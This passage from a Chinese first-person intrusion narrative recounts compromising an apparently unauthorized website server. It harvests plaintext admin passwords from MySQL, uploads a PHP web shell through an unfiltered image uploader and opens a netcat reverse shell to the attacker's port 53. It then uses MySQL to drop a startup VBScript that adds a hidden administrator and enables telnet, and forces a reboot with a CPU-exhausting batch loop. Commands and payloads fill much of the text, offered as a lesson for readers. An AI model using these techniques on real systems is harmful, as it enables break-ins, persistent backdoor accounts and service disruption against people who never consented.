4,絕處逢生
第2天一打開電腦,就在cmd里輸入telnet ip,返回的卻是:
正在連接到xxx.xxx.xxx.xxx...不能打開到主機的連接, 在端口 23: 連接失敗
當時真的很郁悶,又想到了21的FTP,又一個思路冒出來,一個serv-u,設(shè)置好密碼后在把serv-udaemon.ini寫進對方主機,最后登陸,不過仔細想想還是不行,因為MYSQL導出的文件不能覆蓋其他文件……
不行,我還是不能放棄,我把注意力轉(zhuǎn)移到MYSQL的數(shù)據(jù)上,仔細搜索,發(fā)現(xiàn)一個“wangzhan\"的列,進入后發(fā)現(xiàn)USER的表,看到里面有幾個帳號,密碼是名文保存的,接著我聯(lián)想到網(wǎng)站上的管理系統(tǒng),于是馬上依照了第一個行的帳號登入,結(jié)果證明了我的猜測,我成功的進入了,只有發(fā)布新聞,等欄目,
并沒有什么關(guān)于設(shè)置的選項,但是我還是試了一下,點發(fā)布新聞,一個“上傳圖片”的框框映入了我的眼簾,我試著用它上傳phpshell,填好標題,內(nèi)容等后,點了確定,另人激動的時刻到了,我成功了,順利的傳了上去,看來終究是自己編的,竟然沒有對后錯名做限制,出現(xiàn):
home/photo/2013245321.php上傳成功,
結(jié)果我通過這個路徑,得到了phpshell,當時的心情真是無法用言語形容,但是我們現(xiàn)在的權(quán)限還太小,只能讀寫文件,要取道ADMIN權(quán)限才能算真正的占領(lǐng),接著我開始了提升權(quán)限……
5,最后的決戰(zhàn)
經(jīng)過不懈的努力,終于有一個PHPSHELL,這個小小的SHELL,整整經(jīng)過我2天的努力,最后就是提升權(quán)限了,再上傳一個NC,
反向連接:
back(被我改名了) myip 53 -e cmd.exe
就是把幫定的CMDSHELL返回到我的53端口上,然后在自己機上運行
back -vv -l -p 53
順利的得到了SHELL
得到CMDSHELL先看看是什么系統(tǒng)
type %windir%\\system32\\$winnt$.inf
發(fā)現(xiàn)有win adv,這幾個字母,初步判定是win高級服務(wù)器版
再看看他打了什么補丁吧,輸入:regedit /e r.reg HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\hotfix,意思是導出
HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\hotfix,里面含有補丁的信息,但沒成功導出,怎么辦呢,仔細看看WINNT里面的目錄,發(fā)現(xiàn)有一些Q打頭的LOG文件,它就是打了SP后遺留下來的日志文件,用TYPE命令查看,里面有許多是SP4的文件名,很有可能打了SP4,那樣的話就麻煩了……
首先試試WMI吧,是eyas寫的提升權(quán)限的東西,可以在SP3的機上建立一個XX的超級管理員,上傳并運行以后,結(jié)果在我意料之中—拒絕訪問,看來真的打了SP4,這樣可就麻煩了,輸入net start,看看開了什么服務(wù),發(fā)現(xiàn)幾個可以利用的服務(wù):
mysql
Serv-U
于是我開是替換服務(wù)了,但可悲的是,這兩個軟件都裝在C盤,而且C盤是NTFS,更改名字就是拒絕訪問,殺進程就更別說了,哎,感覺又沒有辦法了,但是我還是不能放棄?。ㄉ穸紤?yīng)該被我的精神感動了吧)仔細想想,我又回到了MYSQL上面,因為MYSQL肯定是ADMIN裝的,也就是說隸屬于ADMIN的啟動范圍之類,也就是說可以利用它寫個腳本然后放在“啟動”項內(nèi),于是我趕緊輸入:
use test;
create table 2(cmd TEXT);
insert into 2 values (\"set wsh=CreateObject(\"\"WScript.Shell\"\")\")
insert into 2 values (\"wsh.run \"\"net.exe user aaa aa /add\"\",0\")
insert into 2 values (\"wsh.run \"\"net localgroup administrators aaa /add\"\",0\")
insert into 2 values (\"wsh.run \"net start telnet\",0\")
最后導出在所有USER的“啟動”項內(nèi),最后就是等服務(wù)器重起了,不過俺是個急性子的人,利用messenge漏洞吧,雖然它不能得到SHELL但能使服務(wù)器重起,但仔細一看原來服務(wù)器根本就沒啟動MESSENGE服務(wù),更別說漏洞了……
怎么辦呢,寫個BAT吧,內(nèi)容為:
:begin
start cmd
goto begin
也就是不停的運行CMD,呵呵,更拒絕服務(wù)差不多,不一會CPU就會SAY GOODBYE了。
重起之后的事就不用說了吧……
至此終于入侵完了,回顧整個入侵,幾起幾落,真的是很不容易,耗時3天,最后終于成功了,希望各位讀者們能從這篇文章學會一些有用的知識,而最重要的就是要有永不放棄的精神,而且要善于分析問題。
